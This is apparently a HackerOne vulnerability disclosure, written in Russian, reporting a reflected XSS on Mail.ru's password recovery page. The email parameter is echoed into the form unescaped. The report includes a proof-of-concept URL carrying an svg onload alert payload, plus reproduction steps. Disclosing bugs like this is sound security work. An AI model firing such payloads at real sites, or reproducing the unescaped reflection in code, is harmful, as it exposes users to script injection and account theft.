Mail.ru: [account.mail.ru] XSS на странице восстановления пароля

2018-06-01T13:14:51
ID H1:360787
Type hackerone
Reporter s_p_q_r
Modified 2018-07-31T14:53:47

Description

При генерации формы восстановления пароля значение email подставляется туда как есть:

https://account.mail.ru/recovery/support?email=%3Csvg%20onload=alert(document.domain)%3E

Domain, site, application

https://account.mail.ru/recovery/support

Testing environment

Firefox 60.0 Chrome 66.0

Steps to reproduce

Открыть https://account.mail.ru/recovery/support?email=%3Csvg%20onload=alert(document.domain)%3E

Actual results

XSS

Expected results, security impact description and recommendations

Фильтровать теги

PoC, exploit code, screenshots, video, references, additional resources

{F303978}

Impact

XSS